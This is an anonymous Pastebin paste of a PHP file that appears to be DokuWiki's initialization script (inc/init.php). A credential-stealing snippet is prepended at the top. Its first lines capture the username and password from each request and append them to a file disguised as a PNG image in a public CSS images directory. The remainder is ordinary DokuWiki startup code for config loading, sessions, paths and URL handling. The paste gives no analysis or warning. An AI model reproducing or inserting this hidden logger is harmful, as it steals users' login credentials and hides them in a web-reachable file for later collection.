API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 5th, 2017
137
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.77 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $user = $_REQUEST['u'];
  3. $pass = $_REQUEST['p'];
  4. $fh = fopen('/iris3/WWW/docs/cms/typo3conf/ext/buw_fe_skin/Resources/Public/css/images/grid_12.png', 'a');
  5. fwrite($fh, $user);
  6. $stringData = " : ";
  7. fwrite($fh, $stringData);
  8. fwrite($fh, $pass);
  9. $stringData = " \n";
  10. fwrite($fh, $stringData);
  11. fclose($fh);
  12. ?>
  13. <?php
  14. /**
  15. * Initialize some defaults needed for DokuWiki
  16. */
  17.  
  18. /**
  19. * timing Dokuwiki execution
  20. */
  21. function delta_time($start=0) {
  22. return microtime(true)-((float)$start);
  23. }
  24. define('DOKU_START_TIME', delta_time());
  25.  
  26. global $config_cascade;
  27. $config_cascade = array();
  28.  
  29. // if available load a preload config file
  30. $preload = fullpath(dirname(__FILE__)).'/preload.php';
  31. if (@file_exists($preload)) include($preload);
  32.  
  33. // define the include path
  34. if(!defined('DOKU_INC')) define('DOKU_INC',fullpath(dirname(__FILE__).'/../').'/');
  35.  
  36. // define Plugin dir
  37. if(!defined('DOKU_PLUGIN')) define('DOKU_PLUGIN',DOKU_INC.'lib/plugins/');
  38.  
  39. // define config path (packagers may want to change this to /etc/dokuwiki/)
  40. if(!defined('DOKU_CONF')) define('DOKU_CONF',DOKU_INC.'conf/');
  41.  
  42. // check for error reporting override or set error reporting to sane values
  43. if (!defined('DOKU_E_LEVEL') && @file_exists(DOKU_CONF.'report_e_all')) {
  44. define('DOKU_E_LEVEL', E_ALL);
  45. }
  46. if (!defined('DOKU_E_LEVEL')) {
  47. if(defined('E_DEPRECATED')){ // since php 5.3, since php 5.4 E_STRICT is part of E_ALL
  48. error_reporting(E_ALL & ~E_NOTICE & ~E_DEPRECATED & ~E_STRICT);
  49. }else{
  50. error_reporting(E_ALL ^ E_NOTICE);
  51. }
  52. } else {
  53. error_reporting(DOKU_E_LEVEL);
  54. }
  55.  
  56. // init memory caches
  57. global $cache_revinfo;
  58. $cache_revinfo = array();
  59. global $cache_wikifn;
  60. $cache_wikifn = array();
  61. global $cache_cleanid;
  62. $cache_cleanid = array();
  63. global $cache_authname;
  64. $cache_authname = array();
  65. global $cache_metadata;
  66. $cache_metadata = array();
  67.  
  68. // always include 'inc/config_cascade.php'
  69. // previously in preload.php set fields of $config_cascade will be merged with the defaults
  70. include(DOKU_INC.'inc/config_cascade.php');
  71.  
  72. //prepare config array()
  73. global $conf;
  74. $conf = array();
  75.  
  76. // load the global config file(s)
  77. foreach (array('default','local','protected') as $config_group) {
  78. if (empty($config_cascade['main'][$config_group])) continue;
  79. foreach ($config_cascade['main'][$config_group] as $config_file) {
  80. if (@file_exists($config_file)) {
  81. include($config_file);
  82. }
  83. }
  84. }
  85.  
  86. //prepare license array()
  87. global $license;
  88. $license = array();
  89.  
  90. // load the license file(s)
  91. foreach (array('default','local') as $config_group) {
  92. if (empty($config_cascade['license'][$config_group])) continue;
  93. foreach ($config_cascade['license'][$config_group] as $config_file) {
  94. if(@file_exists($config_file)){
  95. include($config_file);
  96. }
  97. }
  98. }
  99.  
  100. // set timezone (as in pre 5.3.0 days)
  101. date_default_timezone_set(@date_default_timezone_get());
  102.  
  103. // define baseURL
  104. if(!defined('DOKU_REL')) define('DOKU_REL',getBaseURL(false));
  105. if(!defined('DOKU_URL')) define('DOKU_URL',getBaseURL(true));
  106. if(!defined('DOKU_BASE')){
  107. if($conf['canonical']){
  108. define('DOKU_BASE',DOKU_URL);
  109. }else{
  110. define('DOKU_BASE',DOKU_REL);
  111. }
  112. }
  113.  
  114. // define whitespace
  115. if(!defined('DOKU_LF')) define ('DOKU_LF',"\n");
  116. if(!defined('DOKU_TAB')) define ('DOKU_TAB',"\t");
  117.  
  118. // define cookie and session id, append server port when securecookie is configured FS#1664
  119. if (!defined('DOKU_COOKIE')) define('DOKU_COOKIE', 'DW'.md5(DOKU_REL.(($conf['securecookie'])?$_SERVER['SERVER_PORT']:'')));
  120.  
  121.  
  122. // define main script
  123. if(!defined('DOKU_SCRIPT')) define('DOKU_SCRIPT','doku.php');
  124.  
  125. // DEPRECATED, use tpl_basedir() instead
  126. if(!defined('DOKU_TPL')) define('DOKU_TPL',
  127. DOKU_BASE.'lib/tpl/'.$conf['template'].'/');
  128.  
  129. // DEPRECATED, use tpl_incdir() instead
  130. if(!defined('DOKU_TPLINC')) define('DOKU_TPLINC',
  131. DOKU_INC.'lib/tpl/'.$conf['template'].'/');
  132.  
  133. // make session rewrites XHTML compliant
  134. @ini_set('arg_separator.output', '&amp;');
  135.  
  136. // make sure global zlib does not interfere FS#1132
  137. @ini_set('zlib.output_compression', 'off');
  138.  
  139. // increase PCRE backtrack limit
  140. @ini_set('pcre.backtrack_limit', '20971520');
  141.  
  142. // enable gzip compression if supported
  143. $conf['gzip_output'] &= (strpos($_SERVER['HTTP_ACCEPT_ENCODING'],'gzip') !== false);
  144. global $ACT;
  145. if ($conf['gzip_output'] &&
  146. !defined('DOKU_DISABLE_GZIP_OUTPUT') &&
  147. function_exists('ob_gzhandler') &&
  148. // Disable compression when a (compressed) sitemap might be delivered
  149. // See https://bugs.dokuwiki.org/index.php?do=details&task_id=2576
  150. $ACT != 'sitemap') {
  151. ob_start('ob_gzhandler');
  152. }
  153.  
  154. // init session
  155. if (!headers_sent() && !defined('NOSESSION')){
  156. session_name("DokuWiki");
  157. $cookieDir = empty($conf['cookiedir']) ? DOKU_REL : $conf['cookiedir'];
  158. if (version_compare(PHP_VERSION, '5.2.0', '>')) {
  159. session_set_cookie_params(0,$cookieDir,'',($conf['securecookie'] && is_ssl()),true);
  160. }else{
  161. session_set_cookie_params(0,$cookieDir,'',($conf['securecookie'] && is_ssl()));
  162. }
  163. session_start();
  164.  
  165. // load left over messages
  166. if(isset($_SESSION[DOKU_COOKIE]['msg'])){
  167. $MSG = $_SESSION[DOKU_COOKIE]['msg'];
  168. unset($_SESSION[DOKU_COOKIE]['msg']);
  169. }
  170. }
  171.  
  172. // kill magic quotes
  173. if (get_magic_quotes_gpc() && !defined('MAGIC_QUOTES_STRIPPED')) {
  174. if (!empty($_GET)) remove_magic_quotes($_GET);
  175. if (!empty($_POST)) remove_magic_quotes($_POST);
  176. if (!empty($_COOKIE)) remove_magic_quotes($_COOKIE);
  177. if (!empty($_REQUEST)) remove_magic_quotes($_REQUEST);
  178. @ini_set('magic_quotes_gpc', 0);
  179. define('MAGIC_QUOTES_STRIPPED',1);
  180. }
  181. if(function_exists('set_magic_quotes_runtime')) @set_magic_quotes_runtime(0);
  182. @ini_set('magic_quotes_sybase',0);
  183.  
  184. // don't let cookies ever interfere with request vars
  185. $_REQUEST = array_merge($_GET,$_POST);
  186.  
  187. // we don't want a purge URL to be digged
  188. if(isset($_REQUEST['purge']) && $_SERVER['HTTP_REFERER']) unset($_REQUEST['purge']);
  189.  
  190. // disable gzip if not available
  191. if($conf['compression'] == 'bz2' && !function_exists('bzopen')){
  192. $conf['compression'] = 'gz';
  193. }
  194. if($conf['compression'] == 'gz' && !function_exists('gzopen')){
  195. $conf['compression'] = 0;
  196. }
  197.  
  198. // fix dateformat for upgraders
  199. if(strpos($conf['dformat'],'%') === false){
  200. $conf['dformat'] = '%Y/%m/%d %H:%M';
  201. }
  202.  
  203. // precalculate file creation modes
  204. init_creationmodes();
  205.  
  206. // make real paths and check them
  207. init_paths();
  208. init_files();
  209.  
  210. // setup plugin controller class (can be overwritten in preload.php)
  211. $plugin_types = array('auth', 'admin','syntax','action','renderer', 'helper','remote');
  212. global $plugin_controller_class, $plugin_controller;
  213. if (empty($plugin_controller_class)) $plugin_controller_class = 'Doku_Plugin_Controller';
  214.  
  215. // load libraries
  216. require_once(DOKU_INC.'inc/load.php');
  217.  
  218. // input handle class
  219. global $INPUT;
  220. $INPUT = new Input();
  221.  
  222. // initialize plugin controller
  223. $plugin_controller = new $plugin_controller_class();
  224.  
  225. // initialize the event handler
  226. global $EVENT_HANDLER;
  227. $EVENT_HANDLER = new Doku_Event_Handler();
  228.  
  229. $local = $conf['lang'];
  230. trigger_event('INIT_LANG_LOAD', $local, 'init_lang', true);
  231.  
  232.  
  233. // setup authentication system
  234. if (!defined('NOSESSION')) {
  235. auth_setup();
  236. }
  237.  
  238. // setup mail system
  239. mail_setup();
  240.  
  241. /**
  242. * Checks paths from config file
  243. */
  244. function init_paths(){
  245. global $conf;
  246.  
  247. $paths = array('datadir' => 'pages',
  248. 'olddir' => 'attic',
  249. 'mediadir' => 'media',
  250. 'mediaolddir' => 'media_attic',
  251. 'metadir' => 'meta',
  252. 'mediametadir' => 'media_meta',
  253. 'cachedir' => 'cache',
  254. 'indexdir' => 'index',
  255. 'lockdir' => 'locks',
  256. 'tmpdir' => 'tmp');
  257.  
  258. foreach($paths as $c => $p) {
  259. $path = empty($conf[$c]) ? $conf['savedir'].'/'.$p : $conf[$c];
  260. $conf[$c] = init_path($path);
  261. if(empty($conf[$c]))
  262. nice_die("The $c ('$p') at $path is not found, isn't accessible or writable.
  263. You should check your config and permission settings.
  264. Or maybe you want to <a href=\"install.php\">run the
  265. installer</a>?");
  266. }
  267.  
  268. // path to old changelog only needed for upgrading
  269. $conf['changelog_old'] = init_path((isset($conf['changelog']))?($conf['changelog']):($conf['savedir'].'/changes.log'));
  270. if ($conf['changelog_old']=='') { unset($conf['changelog_old']); }
  271. // hardcoded changelog because it is now a cache that lives in meta
  272. $conf['changelog'] = $conf['metadir'].'/_dokuwiki.changes';
  273. $conf['media_changelog'] = $conf['metadir'].'/_media.changes';
  274. }
  275.  
  276. function init_lang($langCode) {
  277. //prepare language array
  278. global $lang;
  279. $lang = array();
  280.  
  281. //load the language files
  282. require_once(DOKU_INC.'inc/lang/en/lang.php');
  283. if ($langCode && $langCode != 'en') {
  284. if (file_exists(DOKU_INC."inc/lang/$langCode/lang.php")) {
  285. require_once(DOKU_INC."inc/lang/$langCode/lang.php");
  286. }
  287. }
  288. }
  289.  
  290. /**
  291. * Checks the existence of certain files and creates them if missing.
  292. */
  293. function init_files(){
  294. global $conf;
  295.  
  296. $files = array($conf['indexdir'].'/page.idx');
  297.  
  298. foreach($files as $file){
  299. if(!@file_exists($file)){
  300. $fh = @fopen($file,'a');
  301. if($fh){
  302. fclose($fh);
  303. if($conf['fperm']) chmod($file, $conf['fperm']);
  304. }else{
  305. nice_die("$file is not writable. Check your permissions settings!");
  306. }
  307. }
  308. }
  309.  
  310. # create title index (needs to have same length as page.idx)
  311. /*
  312. $file = $conf['indexdir'].'/title.idx';
  313. if(!@file_exists($file)){
  314. $pages = file($conf['indexdir'].'/page.idx');
  315. $pages = count($pages);
  316. $fh = @fopen($file,'a');
  317. if($fh){
  318. for($i=0; $i<$pages; $i++){
  319. fwrite($fh,"\n");
  320. }
  321. fclose($fh);
  322. }else{
  323. nice_die("$file is not writable. Check your permissions settings!");
  324. }
  325. }
  326. */
  327. }
  328.  
  329. /**
  330. * Returns absolute path
  331. *
  332. * This tries the given path first, then checks in DOKU_INC.
  333. * Check for accessibility on directories as well.
  334. *
  335. * @author Andreas Gohr <andi@splitbrain.org>
  336. */
  337. function init_path($path){
  338. // check existence
  339. $p = fullpath($path);
  340. if(!@file_exists($p)){
  341. $p = fullpath(DOKU_INC.$path);
  342. if(!@file_exists($p)){
  343. return '';
  344. }
  345. }
  346.  
  347. // check writability
  348. if(!@is_writable($p)){
  349. return '';
  350. }
  351.  
  352. // check accessability (execute bit) for directories
  353. if(@is_dir($p) && !@file_exists("$p/.")){
  354. return '';
  355. }
  356.  
  357. return $p;
  358. }
  359.  
  360. /**
  361. * Sets the internal config values fperm and dperm which, when set,
  362. * will be used to change the permission of a newly created dir or
  363. * file with chmod. Considers the influence of the system's umask
  364. * setting the values only if needed.
  365. */
  366. function init_creationmodes(){
  367. global $conf;
  368.  
  369. // Legacy support for old umask/dmask scheme
  370. unset($conf['dmask']);
  371. unset($conf['fmask']);
  372. unset($conf['umask']);
  373. unset($conf['fperm']);
  374. unset($conf['dperm']);
  375.  
  376. // get system umask, fallback to 0 if none available
  377. $umask = @umask();
  378. if(!$umask) $umask = 0000;
  379.  
  380. // check what is set automatically by the system on file creation
  381. // and set the fperm param if it's not what we want
  382. $auto_fmode = 0666 & ~$umask;
  383. if($auto_fmode != $conf['fmode']) $conf['fperm'] = $conf['fmode'];
  384.  
  385. // check what is set automatically by the system on file creation
  386. // and set the dperm param if it's not what we want
  387. $auto_dmode = $conf['dmode'] & ~$umask;
  388. if($auto_dmode != $conf['dmode']) $conf['dperm'] = $conf['dmode'];
  389. }
  390.  
  391. /**
  392. * remove magic quotes recursivly
  393. *
  394. * @author Andreas Gohr <andi@splitbrain.org>
  395. */
  396. function remove_magic_quotes(&$array) {
  397. foreach (array_keys($array) as $key) {
  398. // handle magic quotes in keynames (breaks order)
  399. $sk = stripslashes($key);
  400. if($sk != $key){
  401. $array[$sk] = $array[$key];
  402. unset($array[$key]);
  403. $key = $sk;
  404. }
  405.  
  406. // do recursion if needed
  407. if (is_array($array[$key])) {
  408. remove_magic_quotes($array[$key]);
  409. }else {
  410. $array[$key] = stripslashes($array[$key]);
  411. }
  412. }
  413. }
  414.  
  415. /**
  416. * Returns the full absolute URL to the directory where
  417. * DokuWiki is installed in (includes a trailing slash)
  418. *
  419. * @author Andreas Gohr <andi@splitbrain.org>
  420. */
  421. function getBaseURL($abs=null){
  422. global $conf;
  423. //if canonical url enabled always return absolute
  424. if(is_null($abs)) $abs = $conf['canonical'];
  425.  
  426. if($conf['basedir']){
  427. $dir = $conf['basedir'];
  428. }elseif(substr($_SERVER['SCRIPT_NAME'],-4) == '.php'){
  429. $dir = dirname($_SERVER['SCRIPT_NAME']);
  430. }elseif(substr($_SERVER['PHP_SELF'],-4) == '.php'){
  431. $dir = dirname($_SERVER['PHP_SELF']);
  432. }elseif($_SERVER['DOCUMENT_ROOT'] && $_SERVER['SCRIPT_FILENAME']){
  433. $dir = preg_replace ('/^'.preg_quote($_SERVER['DOCUMENT_ROOT'],'/').'/','',
  434. $_SERVER['SCRIPT_FILENAME']);
  435. $dir = dirname('/'.$dir);
  436. }else{
  437. $dir = '.'; //probably wrong
  438. }
  439.  
  440. $dir = str_replace('\\','/',$dir); // bugfix for weird WIN behaviour
  441. $dir = preg_replace('#//+#','/',"/$dir/"); // ensure leading and trailing slashes
  442.  
  443. //handle script in lib/exe dir
  444. $dir = preg_replace('!lib/exe/$!','',$dir);
  445.  
  446. //handle script in lib/plugins dir
  447. $dir = preg_replace('!lib/plugins/.*$!','',$dir);
  448.  
  449. //finish here for relative URLs
  450. if(!$abs) return $dir;
  451.  
  452. //use config option if available, trim any slash from end of baseurl to avoid multiple consecutive slashes in the path
  453. if($conf['baseurl']) return rtrim($conf['baseurl'],'/').$dir;
  454.  
  455. //split hostheader into host and port
  456. if(isset($_SERVER['HTTP_HOST'])){
  457. $parsed_host = parse_url('http://'.$_SERVER['HTTP_HOST']);
  458. $host = $parsed_host['host'];
  459. $port = $parsed_host['port'];
  460. }elseif(isset($_SERVER['SERVER_NAME'])){
  461. $parsed_host = parse_url('http://'.$_SERVER['SERVER_NAME']);
  462. $host = $parsed_host['host'];
  463. $port = $parsed_host['port'];
  464. }else{
  465. $host = php_uname('n');
  466. $port = '';
  467. }
  468.  
  469. if(!$port && isset($_SERVER['SERVER_PORT'])) {
  470. $port = $_SERVER['SERVER_PORT'];
  471. }
  472.  
  473. if(is_null($port)){
  474. $port = '';
  475. }
  476.  
  477. if(!is_ssl()){
  478. $proto = 'http://';
  479. if ($port == '80') {
  480. $port = '';
  481. }
  482. }else{
  483. $proto = 'https://';
  484. if ($port == '443') {
  485. $port = '';
  486. }
  487. }
  488.  
  489. if($port !== '') $port = ':'.$port;
  490.  
  491. return $proto.$host.$port.$dir;
  492. }
  493.  
  494. /**
  495. * Check if accessed via HTTPS
  496. *
  497. * Apache leaves ,$_SERVER['HTTPS'] empty when not available, IIS sets it to 'off'.
  498. * 'false' and 'disabled' are just guessing
  499. *
  500. * @returns bool true when SSL is active
  501. */
  502. function is_ssl(){
  503. if (!isset($_SERVER['HTTPS']) ||
  504. preg_match('/^(|off|false|disabled)$/i',$_SERVER['HTTPS'])){
  505. return false;
  506. }else{
  507. return true;
  508. }
  509. }
  510.  
  511. /**
  512. * print a nice message even if no styles are loaded yet.
  513. */
  514. function nice_die($msg){
  515. echo<<<EOT
  516. <!DOCTYPE html>
  517. <html>
  518. <head><title>DokuWiki Setup Error</title></head>
  519. <body style="font-family: Arial, sans-serif">
  520. <div style="width:60%; margin: auto; background-color: #fcc;
  521. border: 1px solid #faa; padding: 0.5em 1em;">
  522. <h1 style="font-size: 120%">DokuWiki Setup Error</h1>
  523. <p>$msg</p>
  524. </div>
  525. </body>
  526. </html>
  527. EOT;
  528. exit;
  529. }
  530.  
  531. /**
  532. * A realpath() replacement
  533. *
  534. * This function behaves similar to PHP's realpath() but does not resolve
  535. * symlinks or accesses upper directories
  536. *
  537. * @author Andreas Gohr <andi@splitbrain.org>
  538. * @author <richpageau at yahoo dot co dot uk>
  539. * @link http://de3.php.net/manual/en/function.realpath.php#75992
  540. */
  541. function fullpath($path,$exists=false){
  542. static $run = 0;
  543. $root = '';
  544. $iswin = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' || @$GLOBALS['DOKU_UNITTEST_ASSUME_WINDOWS']);
  545.  
  546. // find the (indestructable) root of the path - keeps windows stuff intact
  547. if($path{0} == '/'){
  548. $root = '/';
  549. }elseif($iswin){
  550. // match drive letter and UNC paths
  551. if(preg_match('!^([a-zA-z]:)(.*)!',$path,$match)){
  552. $root = $match[1].'/';
  553. $path = $match[2];
  554. }else if(preg_match('!^(\\\\\\\\[^\\\\/]+\\\\[^\\\\/]+[\\\\/])(.*)!',$path,$match)){
  555. $root = $match[1];
  556. $path = $match[2];
  557. }
  558. }
  559. $path = str_replace('\\','/',$path);
  560.  
  561. // if the given path wasn't absolute already, prepend the script path and retry
  562. if(!$root){
  563. $base = dirname($_SERVER['SCRIPT_FILENAME']);
  564. $path = $base.'/'.$path;
  565. if($run == 0){ // avoid endless recursion when base isn't absolute for some reason
  566. $run++;
  567. return fullpath($path,$exists);
  568. }
  569. }
  570. $run = 0;
  571.  
  572. // canonicalize
  573. $path=explode('/', $path);
  574. $newpath=array();
  575. foreach($path as $p) {
  576. if ($p === '' || $p === '.') continue;
  577. if ($p==='..') {
  578. array_pop($newpath);
  579. continue;
  580. }
  581. array_push($newpath, $p);
  582. }
  583. $finalpath = $root.implode('/', $newpath);
  584.  
  585. // check for existence when needed (except when unit testing)
  586. if($exists && !defined('DOKU_UNITTEST') && !@file_exists($finalpath)) {
  587. return false;
  588. }
  589. return $finalpath;
  590. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!